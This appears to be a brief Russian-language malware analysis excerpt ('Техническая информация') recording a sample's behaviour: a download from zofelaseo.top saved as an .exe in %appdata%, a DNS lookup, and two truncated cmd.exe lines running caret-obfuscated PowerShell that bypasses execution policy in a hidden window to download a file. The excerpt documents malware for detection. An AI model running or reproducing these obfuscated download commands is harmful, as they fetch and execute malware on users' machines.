Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWe^Rshe^L^l.^ExE^ -E^X^Ecu^TionP^O^Li^C^Y ^B^y^PA^s^s ^-N^o^P^RofiLE -^WindoWsTYLE^ ^Hi^ddeN^ ^(nEW^-objECt SysT^E^m^.Ne^T.wEB^c^Lie^nT).^do^Wnl^oAd^F^i^Le(^'http://zofelaseo.top...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "p^OWe^Rshe^L^l.^ExE^ -E^X^Ecu^TionP^O^Li^C^Y ^B^y^PA^s^s ^-N^o^P^RofiLE -^WindoWsTYLE^ ^Hi^ddeN^ ^(nEW^-objECt SysT^E^m^.Ne^T.wEB^c^Lie^nT).^do^Wnl^oAd^F^i^Le(^'http://zofelaseo.top...' (со скрытым окном)